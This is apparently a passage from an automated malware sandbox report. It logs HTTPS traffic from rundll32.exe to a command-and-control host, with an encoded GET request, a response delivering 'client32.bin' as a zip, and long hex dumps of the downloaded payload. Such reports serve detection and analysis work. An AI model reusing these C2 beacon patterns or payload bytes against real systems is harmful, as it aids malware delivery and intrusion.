7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                            Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                            2021-12-14 09:21:39 UTC1068INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:39 UTC1084INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:39 UTC1100INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.64981779.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC892OUTGET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC1101INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=skjfg16fsrr25esl9k5i4c28l1; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC1102INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC1117INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC1133INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC1149INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC1165INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC1181INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC1197INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC1213INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC1229INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC1245INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC1261INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:39 UTC1277INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:39 UTC1293INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:39 UTC1309INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:39 UTC1325INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
